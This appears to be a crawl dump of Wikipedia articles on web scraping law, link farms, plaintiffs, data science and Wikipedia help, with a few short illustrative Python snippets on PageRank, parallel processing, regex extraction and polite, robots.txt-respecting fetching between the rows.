penalties. When our laws need to be modified, Congress has a responsibility to act. A simple way to correct this dangerous legal interpretation is to change the CFAA and the wire fraud statutes to exclude terms of service violations. I will introduce a bill that does exactly that. —Rep. Zoe Lofgren, Jan 15, 2013 59 In the wake of the prosecution and subsequent suicide of Aaron Swartz (who used a script to download scholarly research articles in excess of what JSTOR terms of service allowed), lawmakers proposed amending the Computer Fraud and Abuse Act. Representative Zoe Lofgren drafted a bill that would help "prevent what happened to Aaron from happening to other Internet users". 59 Aaron's Law (H.R. 2454, S. 
1196 60 ) would exclude terms of service violations from the 1984 Computer Fraud and Abuse Act and from the wire fraud statute. 61 In addition to Lofgren's efforts, Representatives Darrell Issa and Jared Polis (also on the House Judiciary Committee) raised questions in the immediate aftermath of Swartz's death regarding the government's handling of the case. Polis called the charges "ridiculous and trumped up", referring to Swartz as a "martyr". 62 Issa, chair of the House Oversight Committee, announced an investigation of the Justice Department's prosecution. 62 63 By May 2014, Aaron's Law had stalled in committee. Filmmaker Brian Knappenberger alleges this occurred due to Oracle Corporation's financial interest in maintaining the status quo. 64 Aaron's Law was reintroduced in May 2015 (H.R. 1918, S. 1030 65 ) and again stalled. There has been no further introduction of related bills since. |
313 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Link_farm | On the World Wide Web, a link farm is any group of websites that all hyperlink to other sites in the group for the purpose of increasing SEO rankings. 1 In graph theoretic terms, a link farm is a clique. Although some link farms can be created by hand, most are created through automated programs and services. A link farm is a form of spamming the index of a web search engine (sometimes called spamdexing). Other link exchange systems are designed to allow individual websites to selectively exchange links with other relevant websites, and are not considered a form of spamdexing. Search engines require ways to confirm page relevancy. A known method is to examine for one-way links coming directly from relevant websites. The process of building links should not be confused with being listed on link farms, as the latter requires reciprocal return links, which often renders the overall backlink advantage useless. This is due to oscillation, causing confusion over which is the vendor site and which is the promoting site. Link farms were first developed by search engine optimizers (SEOs) in 1999 to take advantage of the Inktomi search engine's dependence upon link popularity. Although link popularity is used by some search engines to help establish a ranking order for search results, the Inktomi engine at the time maintained two indexes. Search results were produced from the primary index, which was limited to approximately 100 million listings. Pages with few inbound links fell out of the Inktomi index on a monthly basis. Inktomi was targeted for manipulation through link farms because it was then used by several independent but popular search engines. Yahoo , then the most popular search service, also used Inktomi results to supplement its directory search feature. The link farms helped stabilize listings, primarily for online business Websites that had few natural links from larger, more stable sites in the Inktomi index. Link farm exchanges were at first handled on an informal basis, but several service companies were founded to provide automated registration, categorization, and link page updates to member Websites. When the Google search engine became popular, search engine optimizers learned that Google's ranking algorithm depended in part on a link-weighting scheme called PageRank. Rather than simply count all inbound links equally, the PageRank algorithm determines that some links may be more valuable than others, and therefore assigns them more weight than others. Link farming was adapted to help increase the PageRank of member pages. 2 3 However, the link farms became susceptible to manipulation by unscrupulous webmasters who joined the services, received inbound linkage, and then found ways to hide their outbound links or to avoid posting any links on their sites at all. Link farm managers had to implement quality controls and monitor member compliance with their rules to ensure fairness. Alternative link farm products emerged, particularly link-finding software that identified potential reciprocal link partners, sent them template-based emails offering to exchange links, and created directory-like link pages for Websites, in the hope of building their link popularity and PageRank. These link farms are sometimes considered a spamdexing strategy. 
Search engines countered the link farm movement by identifying specific attributes associated with link farm pages and filtering those pages from indexing and search results. In some cases, entire domains were removed from the search engine indexes in order to prevent them from influencing search results. A private blog network (PBN) is a group of blogs that are owned by the same entity. A blog network can either be a group of loosely connected blogs, or a group of blogs that are owned by the same company. The purpose of such a network is usually to promote other sites outside the network and therefore increase the search engine rankings or advertising revenue generated from online advertising on the sites the PBN links to. In September 2014, Google targeted private blog networks (PBNs) with manual action ranking penalties. 4 This served to dissuade search engine optimization and online marketers from using PBNs to increase their online rankings. The "thin content" warnings are closely tied to Panda which focuses on thin content and on-page quality. PBNs have a history of being targeted by Google and therefore may not be the safest option. Since Google is on the search for blog networks, they are not always linked together. In fact, interlinking your blogs could help Google, and a single exposed blog could reveal the whole blog network by looking at the outbound links. A blog network may also refer to a central website, such as WordPress, where a user creates an account and is then able to use their own blog. The created blog forms part of a network because it uses either a subdomain or a subfolder of the main domain, although in all other ways it can be entirely autonomous. This is also known as a hosted blog platform and usually uses the free WordPress Multisite software. Hosted blog networks are also known as Web 2.0 networks, since they became more popular with the rise of the second phase of web development. |
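The link-weighting idea behind PageRank, described in the entry above, can be illustrated with a short power-iteration sketch. The four-page toy graph is invented purely for illustration and is not taken from any real site.

def pagerank(links, damping=0.85, iterations=50):
    # links maps each page to the list of pages it links out to.
    pages = list(links)
    rank = {p: 1.0 / len(pages) for p in pages}
    for _ in range(iterations):
        new_rank = {p: (1 - damping) / len(pages) for p in pages}
        for page, outgoing in links.items():
            targets = outgoing if outgoing else pages  # dead ends share rank with everyone
            share = damping * rank[page] / len(targets)
            for target in targets:
                new_rank[target] += share
        rank = new_rank
    return rank

toy_web = {"a": ["b", "c"], "b": ["c"], "c": ["a"], "d": ["c"]}
print(pagerank(toy_web))  # "c", with the most inbound links, ends up weighted highest

Because rank flows along links rather than being counted equally, a page linked to by already well-linked pages scores higher than one propped up only by a reciprocal clique, which is why search engines discount link-farm structures.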
314 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Plaintiff | A plaintiff ( in legal shorthand) is the party who initiates a lawsuit (also known as an action) before a court. By doing so, the plaintiff seeks a legal remedy. If this search is successful, the court will issue judgment in favor of the plaintiff and make the appropriate court order (e.g., an order for damages). "Plaintiff" is the term used in civil cases in most English-speaking jurisdictions, the notable exceptions being England and Wales, where a plaintiff has, since the introduction of the Civil Procedure Rules in 1999, been known as a "claimant" and Scotland, where the party has always been known as the "pursuer". In criminal cases, the prosecutor brings the case against the defendant, but the key complaining party is often called the "complainant". In some jurisdictions, a lawsuit is commenced by filing a summons, claim form or a complaint. These documents are known as pleadings, that set forth the alleged wrongs committed by the defendant or defendants with a demand for relief. In other jurisdictions, the action is commenced by service of legal process by delivery of these documents on the defendant by a process server; they are only filed with the court subsequently with an affidavit from the process server that they had been given to the defendant according to the rules of civil procedure. In most English-speaking jurisdictions, including Hong Kong, Nigeria, Australia (except in federal jurisdiction), Canada and the United States, as well as in both Northern Ireland and the Republic of Ireland, the legal term "plaintiff" is used as a general term for the party taking action in a civil case. The word plaintiff can be traced to the year 1278, and stems from the Anglo-French word pleintif meaning "complaining". It was identical to "plaintive" at first and receded into legal usage with the -iff spelling in the 15th century. 1 A plaintiff identified by name in a class action is called a named plaintiff. In most common-law jurisdictions, the term "claimant" used in England and Wales since 1999 (see below) is used only in specific, often non-judicial contexts. In particular, in American usage, terms such as "claimant" and "claim form" are limited to extrajudicial process in insurance and administrative law. After exhausting remedies available through an insurer or government agency, an American claimant in need of further relief would turn to the courts, file a complaint (thus establishing a real court case under judicial supervision) and become a plaintiff. In England and Wales, the term "claimant" replaced "plaintiff" after the Civil Procedure Rules came into force on 26 April 1999. 2 The move, which brings England and Wales out of line with general usage in English-speaking jurisdictions, was reportedly based on an assessment that the word "claimant" is more acceptable as "plain English" than the word "plaintiff". 3 In Scottish law a plaintiff is referred to as a "pursuer" and a defendant as a "defender". 4 The similar term "complainant" denotes the complaining witness in a criminal proceeding. In the Federal Court of Australia, most plaintiffs are called "applicants", but in admiralty and corporations law matters they are called "plaintiffs". 5 Case names are usually given with the plaintiff first, as in Plaintiff v. Defendant (orally, Plaintiff and Defendant). The party against whom the complaint is made is the defendant; or, in the case of a petition, a respondent. 
Subsequent references to a case may use only one of the names, typically that of the first nongovernmental party. 6 Criminal cases are usually brought by the prosecution, not a plaintiff. The prosecution may bring the case formally in the name of the monarch, state or government. In many Commonwealth realms, this is the king (or queen, when the monarch is female), named the Crown, abbreviated R, thus R v Defendant (orally, R against (versus) Defendant). In several U.S. states, including California, Illinois, Michigan, and New York, the prosecution of a criminal case is captioned as The People of the State of, followed by the name of the state, or People for short. 7 |
315 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_science | Data science is an interdisciplinary academic field 1 that uses statistics, scientific computing, scientific methods, processes, scientific visualization, algorithms and systems to extract or extrapolate knowledge and insights from potentially noisy, structured, or unstructured data. 2 Data science also integrates domain knowledge from the underlying application domain (e.g., natural sciences, information technology, and medicine). 3 Data science is multifaceted and can be described as a science, a research paradigm, a research method, a discipline, a workflow, and a profession. 4 Data science is "a concept to unify statistics, data analysis, informatics, and their related methods" to "understand and analyze actual phenomena" with data. 5 It uses techniques and theories drawn from many fields within the context of mathematics, statistics, computer science, information science, and domain knowledge. 6 However, data science is different from computer science and information science. Turing Award winner Jim Gray imagined data science as a "fourth paradigm" of science (empirical, theoretical, computational, and now data-driven) and asserted that "everything about science is changing because of the impact of information technology" and the data deluge. 7 8 A data scientist is a professional who creates programming code and combines it with statistical knowledge to create insights from data. 9 Data science is an interdisciplinary field 10 focused on extracting knowledge from typically large data sets and applying the knowledge and insights from that data to solve problems in a wide range of application domains. The field encompasses preparing data for analysis, formulating data science problems, analyzing data, developing data-driven solutions, and presenting findings to inform high-level decisions in a broad range of application domains. As such, it incorporates skills from computer science, statistics, information science, mathematics, data visualization, information visualization, data sonification, data integration, graphic design, complex systems, communication and business. 11 12 Statistician Nathan Yau, drawing on Ben Fry, also links data science to human computer interaction: users should be able to intuitively control and explore data. 13 14 In 2015, the American Statistical Association identified database management, statistics and machine learning, and distributed and parallel systems as the three emerging foundational professional communities. 15 Many statisticians, including Nate Silver, have argued that data science is not a new field, but rather another name for statistics. 16 Others argue that data science is distinct from statistics because it focuses on problems and techniques unique to digital data. 17 Vasant Dhar writes that statistics emphasizes quantitative data and description. In contrast, data science deals with quantitative and qualitative data (e.g., from images, text, sensors, transactions, customer information, etc.) and emphasizes prediction and action. 18 Andrew Gelman of Columbia University has described statistics as a non-essential part of data science. 19 Stanford professor David Donoho writes that data science is not distinguished from statistics by the size of datasets or use of computing and that many graduate programs misleadingly advertise their analytics and statistics training as the essence of a data-science program. 
He describes data science as an applied field growing out of traditional statistics. 20 In 1962, John Tukey described a field he called "data analysis", which resembles modern data science. 20 In 1985, in a lecture given to the Chinese Academy of Sciences in Beijing, C. F. Jeff Wu used the term "data science" for the first time as an alternative name for statistics. 21 Later, attendees at a 1992 statistics symposium at the University of Montpellier II acknowledged the emergence of a new discipline focused on data of various origins and forms, combining established concepts and principles of statistics and data analysis with computing. 22 23 The term "data science" has been traced back to 1974, when Peter Naur proposed it as an alternative name to computer science. 6 In 1996, the International Federation of Classification Societies became the first conference to specifically feature data science as a topic. 6 However, the definition was still in flux. After the 1985 lecture at the Chinese Academy of Sciences in Beijing, in 1997 C. F. Jeff Wu again suggested that statistics should be renamed data science. He reasoned that a new name would help statistics shed inaccurate stereotypes, such as being synonymous with accounting or limited to describing data. 24 In 1998, Hayashi Chikio argued for data science as a new, interdisciplinary concept, with three aspects: data design, collection, and analysis. 23 During the 1990s, popular terms for the process of finding patterns in datasets (which were increasingly large) included "knowledge discovery" and "data mining". 6 25 In 2012, technologists Thomas H. Davenport and DJ Patil declared "Data Scientist: The Sexiest Job of the 21st Century", 26 a catchphrase that was picked up even by major-city newspapers like the New York Times 27 and the Boston Globe. 28 A decade later, they reaffirmed it, stating that "the job is more in demand than ever with employers". 29 The modern conception of data science as an independent discipline is sometimes attributed to William S. Cleveland. 30 In a 2001 paper, he advocated an expansion of statistics beyond theory into technical areas; because this would significantly change the field, it warranted a new name. 25 "Data science" became more widely used in the next few years: in 2002, the Committee on Data for Science and Technology launched the Data Science Journal. In 2003, Columbia University launched The Journal of Data Science. 25 In 2014, the American Statistical Association's Section on Statistical Learning and Data Mining changed its name to the Section on Statistical Learning and Data Science, reflecting the ascendant popularity of data science. 31 The professional title of "data scientist" has been attributed to DJ Patil and Jeff Hammerbacher in 2008. 32 Though it was used by the National Science Board in their 2005 report "Long-Lived Digital Data Collections: Enabling Research and Education in the 21st Century", it referred broadly to any key role in managing a digital data collection. 33 There is still no consensus on the definition of data science, and it is considered by some to be a buzzword. 34 Big data is a related marketing term. 35 Data scientists are responsible for breaking down big data into usable information and creating software and algorithms that help companies and organizations determine optimal operations. 36 Data science and data analysis are both important disciplines in the field of data management and analysis, but they differ in several key ways. 
While both fields involve working with data, data science is more of an interdisciplinary field that involves the application of statistical, computational, and machine learning methods to extract insights from data and make predictions, while data analysis is more focused on the examination and interpretation of data to identify patterns and trends. 37 38 Data analysis typically involves working with smaller, structured datasets to answer specific questions or solve specific problems. This can involve tasks such as data cleaning, data visualization, and exploratory data analysis to gain insights into the data and develop hypotheses about relationships between variables. Data analysts typically use statistical methods to test these hypotheses and draw conclusions from the data. For example, a data analyst might analyze sales data to identify trends in customer behavior and make recommendations for marketing strategies. 37 Data science, on the other hand, is a more complex and iterative process that involves working with larger, more complex datasets that often require advanced computational and statistical methods to analyze. Data scientists often work with unstructured data such as text or images and use machine learning algorithms to build predictive models and make data-driven decisions. In addition to statistical analysis, data science often involves tasks such as data preprocessing, feature engineering, and model selection. For instance, a data scientist might develop a recommendation system for an e-commerce platform by analyzing user behavior patterns and using machine learning algorithms to predict user preferences. 38 39 While data analysis focuses on extracting insights from existing data, data science goes beyond that by incorporating the development and implementation of predictive models to make informed decisions. Data scientists are often responsible for collecting and cleaning data, selecting appropriate analytical techniques, and deploying models in real-world scenarios. They work at the intersection of mathematics, computer science, and domain expertise to solve complex problems and uncover hidden patterns in large datasets. 38 Despite these differences, data science and data analysis are closely related fields and often require similar skill sets. Both fields require a solid foundation in statistics, programming, and data visualization, as well as the ability to communicate findings effectively to both technical and non-technical audiences. Both fields benefit from critical thinking and domain knowledge, as understanding the context and nuances of the data is essential for accurate analysis and modeling. 37 38 In summary, data analysis and data science are distinct yet interconnected disciplines within the broader field of data management and analysis. Data analysis focuses on extracting insights and drawing conclusions from structured data, while data science involves a more comprehensive approach that combines statistical analysis, computational methods, and machine learning to extract insights, build predictive models, and drive data-driven decision-making. Both fields use data to understand patterns, make informed decisions, and solve complex problems across various domains. Cloud computing can offer access to large amounts of computational power and storage. 40 In big data, where volumes of information are continually generated and processed, these platforms can be used to handle complex and resource-intensive analytical tasks. 
41 Some distributed computing frameworks are designed to handle big data workloads. These frameworks can enable data scientists to process and analyze large datasets in parallel, which can reduce processing times. 42 Data science involves collecting, processing, and analyzing data, which often includes personal and sensitive information. Ethical concerns include potential privacy violations, bias perpetuation, and negative societal impacts. 43 44 Machine learning models can amplify existing biases present in training data, leading to discriminatory or unfair outcomes. 45 46 |
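The parallel, chunked processing mentioned above can be sketched with nothing more than the standard library. The word-count job and the toy documents are placeholders for whatever per-record analysis a real pipeline would run.

from multiprocessing import Pool

def analyze(document):
    # Stand-in for a per-record analysis step: count the words in one document.
    return len(document.split())

if __name__ == "__main__":
    documents = ["first toy document", "a second slightly longer toy document", "third"]
    with Pool(processes=2) as pool:
        word_counts = pool.map(analyze, documents)  # each document is handled by a worker process
    print(word_counts)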
316 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Help:Contents | This page provides help with the most common questions about Wikipedia. You can also search Wikipedia's help pages using the search box below, or browse the Help menu or the Help directory. The Readers' FAQ and our about page contain the most commonly sought information about Wikipedia. For simple searches, there is a search box at the top of every page. Type what you are looking for in the box. Partial matches will appear in a dropdown list. Select any page in the list to go to that page. Or, select the magnifying glass "Go" button, or press Enter, to go to a full search result. For advanced searches, see Help:Searching. There are other ways to browse and explore Wikipedia articles; many can be found at Wikipedia:Contents. See our disclaimer for cautions about Wikipedia's limitations. For mobile access, press the mobile view link at the very bottom of every desktop view page. Contributing is easy: see how to edit a page. For a quick summary on participating, see contributing to Wikipedia, and for a friendly tutorial, see our introduction. For a listing of introductions and tutorials by topic, see getting started. The Simplified Manual of Style and Cheatsheet can remind you of basic wiki markup. Be bold in improving articles When adding facts, please provide references so others may verify them. If you are affiliated with the article subject, please see our conflict of interest guideline. The simple guide to vandalism cleanup can help you undo malicious edits. If you're looking for places you can help out, the Task Center is the place to go, or check out what else is happening at the community portal. You can practice editing and experiment in a sandboxyour sandbox. If there is a problem with an article about yourself, a family member, a friend or a colleague, please read Biographies of living persons Help. If you spot a problem with an article, you can fix it directly, by clicking on the "Edit" link at the top of that page. See the "edit an article" section of this page for more information. If you don't feel ready to fix the article yourself, post a message on the article's talk page. This will bring the matter to the attention of others who work on that article. There is a "Talk" link at the beginning of every article page. You can contact us. If it's an article about you or your organization, see Contact us Subjects. Check Your first article to see if your topic is appropriate, then the Article wizard will walk you through creating the article. Once you have created an article, see Writing better articles for guidance on how to improve it and what to include (like reference citations). For contributing images, audio or video files, see the Introduction to uploading images. Then the Upload wizard will guide you through that process. Answers to common problems can be found at frequently asked questions. Or check out where to ask questions or make comments. New users should seek help at the Teahouse if they're having problems while editing Wikipedia. More complex questions can be posed at the Help desk. Volunteers will respond as soon as they're able. Or ask for help on your talk page and a volunteer will visit you there You can get live help with editing in the help chatroom. For help with technical issues, ask at the Village pump. If searching Wikipedia has not answered your question (for example, questions like "Which country has the world's largest fishing fleet? ), try the Reference Desk. 
Volunteers there will attempt to answer your questions on any topic, or point you toward the information you need. |
317 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-8 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
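The regular-expression approach to extraction described earlier in this entry can be sketched as follows. The HTML snippet and the two patterns are invented for illustration; a real page would be fetched with requests and the patterns adjusted to its markup.

import re
from bs4 import BeautifulSoup

sample_html = """
<html><body>
  <p>Contact sales@example.com for a quote. Prices start at $199, down 15% this week.</p>
</body></html>
"""

text = BeautifulSoup(sample_html, "html.parser").get_text(" ", strip=True)
emails = re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", text)  # crude e-mail pattern
prices = re.findall(r"\$\d+(?:\.\d{2})?", text)          # dollar amounts such as $199
print(emails, prices)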
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
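The entry above closes by noting that site administrators use various measures to stop or slow bots. A scraper can cooperate with the most basic of these by honoring robots.txt and pacing its requests; a minimal sketch follows, with a hypothetical site URL and path.

import time
import requests
from urllib.parse import urljoin
from urllib.robotparser import RobotFileParser

def polite_get(base_url, path, delay=2.0, user_agent="example-bot"):
    # Check robots.txt before fetching, and wait between requests.
    robots = RobotFileParser(urljoin(base_url, "/robots.txt"))
    robots.read()
    url = urljoin(base_url, path)
    if not robots.can_fetch(user_agent, url):
        raise PermissionError(f"robots.txt disallows fetching {url}")
    time.sleep(delay)  # simple rate limiting
    return requests.get(url, headers={"User-Agent": user_agent}, timeout=10)

# Example usage (hypothetical site):
# response = polite_get("https://example.com", "/listings")
# print(response.status_code)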
